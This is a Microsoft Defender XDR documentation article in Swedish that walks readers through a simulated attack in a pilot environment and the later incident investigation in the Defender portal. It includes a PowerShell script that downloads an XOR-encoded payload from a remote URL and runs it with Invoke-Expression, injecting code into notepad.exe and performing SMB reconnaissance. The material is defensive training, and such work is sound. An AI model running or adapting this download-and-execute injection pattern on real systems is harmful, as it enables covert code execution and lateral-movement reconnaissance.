Köra en attacksimulering i en Microsoft Defender XDR pilotmiljö

  • Artikel

Den här artikeln är steg 1 av 2 i processen för att utföra en undersökning och svar av en incident i Microsoft Defender XDR med hjälp av en pilotmiljö. Mer information om den här processen finns i översiktsartikeln .

När du har förberett pilotmiljön är det dags att testa Microsoft Defender XDR incidenthantering och automatiserade undersöknings- och reparationsfunktioner genom att skapa en incident med en simulerad attack och använda Microsoft Defender-portalen för att undersöka och svara.

En incident i Microsoft Defender XDR är en samling korrelerade aviseringar och associerade data som utgör berättelsen om en attack.

Microsoft 365-tjänster och -appar skapar aviseringar när de identifierar en misstänkt eller skadlig händelse eller aktivitet. Enskilda aviseringar ger värdefulla ledtrådar om en slutförd eller pågående attack. Attacker använder dock vanligtvis olika tekniker mot olika typer av entiteter, till exempel enheter, användare och postlådor. Resultatet är flera aviseringar för flera entiteter i din klientorganisation.

Obs!

Om du är helt ny på säkerhetsanalys och incidenthantering läser du genomgången Svara på din första incident för att få en guidad rundtur i en typisk process för analys, reparation och granskning efter incident.

Simulera attacker med Microsoft Defender-portalen

Microsoft Defender-portalen har inbyggda funktioner för att skapa simulerade attacker i pilotmiljön:

Defender för Office 365 Övning av attacksimulering

Defender för Office 365 med Microsoft 365 E5 eller Microsoft Defender för Office 365 Plan 2 omfattar träning av attacksimulering för nätfiskeattacker. De grundläggande stegen är:

  1. Skapa en simulering

    Stegvisa instruktioner för hur du skapar och startar en ny simulering finns i Simulera en nätfiskeattack.

  2. Skapa en nyttolast

    Stegvisa instruktioner för hur du skapar en nyttolast för användning i en simulering finns i Skapa en anpassad nyttolast för träning av attacksimulering.

  3. Få insikter

    Stegvisa instruktioner om hur du får insikter med rapportering finns i Få insikter genom träning av attacksimulering.

Mer information finns i Simuleringar.

Självstudier för Defender för Endpoint-attacker & simuleringar

Här är Defender för Endpoint-simuleringar från Microsoft:

  • Dokument släpper bakdörr
  • Automatiserad undersökning (bakdörr)

Det finns ytterligare simuleringar från tredjepartskällor. Det finns också en uppsättning självstudier.

För varje simulering eller självstudie:

  1. Ladda ned och läs motsvarande genomgångsdokument.

  2. Ladda ned simuleringsfilen. Du kan välja att ladda ned filen eller skriptet på testenheten, men det är inte obligatoriskt.

  3. Kör simuleringsfilen eller skriptet på testenheten enligt instruktionerna i genomgångsdokumentet.

Mer information finns i Experience Microsoft Defender för Endpoint through simulated attack (Erfarenhet Microsoft Defender för Endpoint genom simulerad attack).

Simulera en attack med en isolerad domänkontrollant och klientenhet (valfritt)

I den här valfria incidenthanteringsövningen simulerar du en attack på en isolerad Active Directory Domain Services domänkontrollant (AD DS) och En Windows-enhet med hjälp av ett PowerShell-skript och undersöker, åtgärdar och löser sedan incidenten.

Först måste du lägga till slutpunkter i pilotmiljön.

Lägga till slutpunkter för pilotmiljö

Först måste du lägga till en isolerad AD DS-domänkontrollant och en Windows-enhet i pilotmiljön.

  1. Kontrollera att pilotmiljöns klientorganisation har aktiverat Microsoft Defender XDR.

  2. Kontrollera att domänkontrollanten:

  3. Kontrollera att testenheten:

Om du använder klient- och enhetsgrupper skapar du en dedikerad enhetsgrupp för testenheten och push-överför den till den översta nivån.

Ett alternativ är att vara värd för din AD DS-domänkontrollant och testa enheten som virtuella datorer i Microsoft Azure-infrastrukturtjänster. Du kan använda anvisningarna i fas 1 i testlabbguiden för simulerat företag, men hoppa över skapandet av den virtuella datorn APP1.

Här är resultatet.

Utvärderingsmiljön med hjälp av testlabbguiden för simulerat företag

Du simulerar en sofistikerad attack som använder avancerade tekniker för att dölja för identifiering. Attacken räknar upp öppnade SMB-sessioner (Server Message Block) på domänkontrollanter och hämtar de senaste IP-adresserna för användarnas enheter. Den här kategorin av attacker inkluderar vanligtvis inte filer som släppts på offrets enhet och de sker enbart i minnet. De "lever av marken" med hjälp av befintliga system- och administrativa verktyg och matar in sin kod i systemprocesser för att dölja sin körning. Med det här beteendet kan de undvika identifiering och bevara på enheten.

I den här simuleringen börjar vårt exempelscenario med ett PowerShell-skript. I verkligheten kan en användare luras att köra ett skript eller så kan skriptet köras från en fjärranslutning till en annan dator från en tidigare infekterad enhet, vilket indikerar att angriparen försöker flytta i taget i nätverket. Det kan vara svårt att identifiera dessa skript eftersom administratörer ofta kör skript via fjärranslutning för att utföra olika administrativa aktiviteter.

Den fillösa PowerShell-attacken med processinmatning och SMB-rekognoseringsattack

Under simuleringen injicerar attacken shellcode i en till synes oskyldig process. Scenariot kräver användning av notepad.exe. Vi valde den här processen för simuleringen, men angripare skulle mer sannolikt rikta in sig på en tidskrävande systemprocess, till exempel svchost.exe. Shellcode fortsätter sedan med att kontakta angriparens C2-server (command-and-control) för att få instruktioner om hur du fortsätter. Skriptet försöker köra rekognoseringsfrågor mot domänkontrollanten (DC). Med rekognosering kan en angripare få information om den senaste inloggningsinformationen för användaren. När angripare har den här informationen kan de flytta i sidled i nätverket för att komma till ett specifikt känsligt konto

Viktigt

För optimala resultat följer du instruktionerna för attacksimulering så nära som möjligt.

Kör den isolerade AD DS-domänkontrollantens attacksimulering

Så här kör du simuleringen av attackscenariot:

  1. Se till att pilotmiljön innehåller den isolerade AD DS-domänkontrollanten och Windows-enheten.

  2. Logga in på testenheten med testanvändarkontot.

  3. Öppna ett Windows PowerShell fönster på testenheten.

  4. Kopiera följande simuleringsskript:

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
$base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
$decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
$i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))

    Obs!

    Om du öppnar den här artikeln i en webbläsare kan det uppstå problem med att kopiera den fullständiga texten utan att förlora vissa tecken eller införa extra radbrytningar. I så fall laddar du ned det här dokumentet och öppnar det på Adobe Reader.

  5. Klistra in och kör det kopierade skriptet i PowerShell-fönstret.

Obs!

Om du kör PowerShell med hjälp av RDP (Remote Desktop Protocol) använder du kommandot Type Urklippstext i RDP-klienten eftersom metoden CTRL-V hotkey eller right-click-paste kanske inte fungerar. De senaste versionerna av PowerShell accepterar ibland inte heller den metoden. Du kan behöva kopiera till Anteckningar i minnet först, kopiera den i den virtuella datorn och sedan klistra in den i PowerShell.

Några sekunder senare öppnas Anteckningar-appen. En simulerad attackkod matas in i Anteckningar. Håll den automatiskt genererade Anteckningar-instansen öppen för att uppleva hela scenariot.

Den simulerade attackkoden försöker kommunicera med en extern IP-adress (simuleraR C2-servern) och försöker sedan rekognosera mot domänkontrollanten via SMB.

Det här meddelandet visas i PowerShell-konsolen när skriptet har slutförts:

ran NetSessionEnum against [DC Name] with return code result 0

Om du vill se funktionen Automatiserad incident och svar i praktiken håller du notepad.exe processen öppen. Du ser att automatiserade incidenter och svar stoppar anteckningarna.

Undersöka incidenten för den simulerade attacken

Obs!

Innan vi går igenom den här simuleringen watch följande video för att se hur incidenthantering hjälper dig att pussla ihop relaterade aviseringar som en del av undersökningsprocessen, där du hittar den i portalen och hur den kan hjälpa dig i dina säkerhetsåtgärder:

Om du växlar till SOC-analytikerns synvinkel kan du nu börja undersöka attacken i Microsoft Defender-portalen.

  1. Öppna Microsoft Defender-portalen.

  2. I navigeringsfönstret väljer du Incidenter & Aviseringsincidenter>.

  3. Den nya incidenten för den simulerade attacken visas i incidentkön.

    Ett exempel på incidentkön

Undersök attacken som en enskild incident

Microsoft Defender XDR korrelerar analys och aggregerar alla relaterade aviseringar och undersökningar från olika produkter till en incidententitet. Genom att göra det visar Microsoft Defender XDR en bredare attackhistoria, vilket gör det möjligt för SOC-analytikern att förstå och svara på komplexa hot.

Aviseringarna som genereras under den här simuleringen är associerade med samma hot och aggregeras därför automatiskt som en enda incident.

Så här visar du incidenten:

  1. Öppna Microsoft Defender-portalen.

  2. I navigeringsfönstret väljer du Incidenter & Aviseringsincidenter>.

  3. Välj det senaste objektet genom att klicka på cirkeln till vänster om incidentnamnet. En sidopanel visar ytterligare information om incidenten, inklusive alla relaterade aviseringar. Varje incident har ett unikt namn som beskriver det baserat på attributen för de aviseringar som den innehåller.

    Aviseringarna som visas på instrumentpanelen kan filtreras baserat på tjänstresurser: Microsoft Defender for Identity, Microsoft Defender for Cloud Apps, Microsoft Defender för Endpoint, Microsoft Defender XDR och Microsoft Defender för Office 365.

  4. Välj Sidan Öppna incident för att få mer information om incidenten.

    På sidan Incident kan du se alla aviseringar och information som är relaterade till incidenten. Informationen omfattar de entiteter och tillgångar som är inblandade i aviseringen, identifieringskällan för aviseringarna (till exempel Microsoft Defender for Identity eller Microsoft Defender för Endpoint) och anledningen till att de kopplades samman. I listan med incidentaviseringar visas hur attacken fortskrider. I den här vyn kan du se och undersöka enskilda aviseringar.

    Du kan också klicka på Hantera incident på den högra menyn för att tagga incidenten, tilldela den till dig själv och lägga till kommentarer.

Granska genererade aviseringar

Nu ska vi titta på några av aviseringarna som genererades under den simulerade attacken.

Obs!

Vi går bara igenom några av de aviseringar som genererades under den simulerade attacken. Beroende på vilken version av Windows och Microsoft Defender XDR produkter som körs på testenheten kan du se fler aviseringar som visas i en något annorlunda ordning.

Ett exempel på en genererad avisering

Avisering: Misstänkt processinmatning observeras (källa: Microsoft Defender för Endpoint)

Avancerade angripare använder avancerade och smygande metoder för att bevara i minnet och gömma sig från identifieringsverktyg. En vanlig teknik är att arbeta inifrån en betrodd systemprocess i stället för en skadlig körbar fil, vilket gör det svårt för identifieringsverktyg och säkerhetsåtgärder att upptäcka den skadliga koden.

För att SOC-analytikerna ska kunna fånga dessa avancerade attacker Microsoft Defender för Endpoint djupminnessensorer i ge vår molntjänst oöverträffad insyn i en mängd olika metoder för kodinmatning mellan processer. Följande bild visar hur Defender för Endpoint identifierades och aviseras vid försöket att mata in kod för att notepad.exe.

Ett exempel på aviseringen om inmatning av en potentiellt skadlig kod

Avisering: Oväntat beteende som observeras av en process som körs utan kommandoradsargument (källa: Microsoft Defender för Endpoint)

Microsoft Defender för Endpoint identifieringar är ofta inriktade på det vanligaste attributet för en attackteknik. Den här metoden garanterar hållbarhet och höjer fältet så att angripare kan växla till nyare taktiker.

Vi använder storskaliga inlärningsalgoritmer för att fastställa det normala beteendet för vanliga processer i en organisation och över hela världen och watch när dessa processer visar avvikande beteenden. Dessa avvikande beteenden indikerar ofta att överflödig kod introducerades och körs i en annars betrodd process.

I det här scenariot uppvisar processen notepad.exe onormalt beteende, vilket inbegriper kommunikation med en extern plats. Det här resultatet är oberoende av den specifika metod som används för att introducera och köra skadlig kod.

Obs!

Eftersom den här aviseringen baseras på maskininlärningsmodeller som kräver ytterligare serverdelsbearbetning kan det ta lite tid innan du ser den här aviseringen i portalen.

Observera att aviseringsinformationen innehåller den externa IP-adressen – en indikator som du kan använda som en pivot för att expandera undersökningen.

Välj IP-adressen i aviseringsprocessträdet för att visa sidan med IP-adressinformation.

Ett exempel på oväntat beteende av en process som körs utan kommandoradsargument

Följande bild visar den valda sidan med IP-adressinformation (klicka på IP-adress i aviseringsprocessträdet).

Ett exempel på sidan med IP-adressinformation

Avisering: SMB (User and IP Address Reconnaissance) (Källa: Microsoft Defender for Identity)

Uppräkning med hjälp av SMB-protokollet (Server Message Block) gör det möjligt för angripare att få den senaste informationen om användarinloggning som hjälper dem att gå sidlede genom nätverket för att få åtkomst till ett specifikt känsligt konto.

I den här identifieringen utlöses en avisering när SMB-sessionsuppräkningen körs mot en domänkontrollant.

Ett exempel på Microsoft Defender for Identity avisering för rekognosering av användare och IP-adresser

Granska enhetens tidslinje med Microsoft Defender för Endpoint

När du har utforskat de olika aviseringarna i den här incidenten går du tillbaka till incidentsidan som du undersökte tidigare. Välj fliken Enheter på incidentsidan för att granska de enheter som är inblandade i den här incidenten enligt rapporter från Microsoft Defender för Endpoint och Microsoft Defender for Identity.

Välj namnet på den enhet där attacken utfördes för att öppna entitetssidan för den specifika enheten. På den sidan kan du se aviseringar som utlöstes och relaterade händelser.

Välj fliken Tidslinje för att öppna enhetens tidslinje och visa alla händelser och beteenden som observerats på enheten i kronologisk ordning, varvat med de utlösta aviseringarna.

Ett exempel på enhetens tidslinje med beteenden

Om du expanderar några av de mer intressanta beteendena får du användbar information, till exempel processträd.

Rulla till exempel nedåt tills du hittar aviseringshändelsen Misstänkt processinmatning observerad. Välj den powershell.exe som matas in till notepad.exe processhändelsen under den för att visa hela processträdet för det här beteendet under diagrammet Händelseentiteter i sidofönstret. Använd sökfältet för filtrering om det behövs.

Ett exempel på processträdet för valt beteende för att skapa PowerShell-filer

Granska användarinformationen med Microsoft Defender for Cloud Apps

På incidentsidan väljer du fliken Användare för att visa listan över användare som är inblandade i attacken. Tabellen innehåller ytterligare information om varje användare, inklusive varje användares undersökningsprioritetspoäng .

Välj användarnamnet för att öppna användarens profilsida där ytterligare undersökning kan utföras. Läs mer om att undersöka riskfyllda användare.

Användarsida för Defender för Cloud Apps

Automatiska undersökningar och åtgärd

Obs!

Innan vi går igenom den här simuleringen watch följande video för att bekanta dig med vad automatisk självåterställning är, var du hittar den i portalen och hur den kan hjälpa dig i dina säkerhetsåtgärder:

Gå tillbaka till incidenten i Microsoft Defender-portalen. Fliken Undersökningar på sidan Incident visar de automatiserade undersökningar som utlöstes av Microsoft Defender for Identity och Microsoft Defender för Endpoint. Skärmbilden nedan visar endast den automatiserade undersökning som utlöses av Defender för Endpoint. Som standard reparerar Defender för Endpoint automatiskt artefakterna som finns i kön, vilket kräver reparation.

Ett exempel på automatiserade undersökningar relaterade till incidenten

Välj den avisering som utlöste en undersökning för att öppna sidan Undersökningsinformation . Du ser följande information:

  • Aviseringar som utlöste den automatiserade undersökningen.
  • Berörda användare och enheter. Om indikatorer hittas på ytterligare enheter visas även dessa ytterligare enheter.
  • Lista över bevis. Entiteterna hittades och analyserades, till exempel filer, processer, tjänster, drivrutiner och nätverksadresser. Dessa entiteter analyseras för möjliga relationer till aviseringen och klassificeras som godartade eller skadliga.
  • Hot hittades. Kända hot som hittas under undersökningen.

Obs!

Beroende på tidpunkten kan den automatiserade undersökningen fortfarande köras. Vänta några minuter tills processen har slutförts innan du samlar in och analyserar bevisen och granskar resultaten. Uppdatera sidan Undersökningsinformation för att få de senaste resultaten.

Ett exempel på sidan Undersökningsinformation

Under den automatiserade undersökningen identifierade Microsoft Defender för Endpoint den notepad.exe processen, som matades in som en av artefakterna som kräver reparation. Defender för Endpoint stoppar automatiskt den misstänkta processinmatningen som en del av den automatiserade reparationen.

Du kan se notepad.exe försvinna från listan över processer som körs på testenheten.

Lösa incidenten

När undersökningen har slutförts och bekräftats vara åtgärdad löser du incidenten.

På sidan Incident väljer du Hantera incident. Ange status till Lös incident och välj Sann avisering för klassificering och säkerhetstestning för bestämning.

Ett exempel på incidentsidan med öppna panelen Hantera incident där du kan klicka på växeln för att lösa incidenten

När incidenten har lösts löser den alla associerade aviseringar i Microsoft Defender-portalen och relaterade portaler.

Detta omsluter attacksimuleringar för incidentanalys, automatiserad undersökning och incidentlösning.

Nästa steg

Funktionerna för Microsoft Defender XDR incidenthantering

Steg 2 av 2: Prova Microsoft Defender XDR incidenthanteringsfunktioner

Skapa Microsoft Defender XDR utvärderingsmiljön

Tips

Vill du veta mer? Engage med Microsofts säkerhetscommunity i vår Tech Community: Microsoft Defender XDR Tech Community.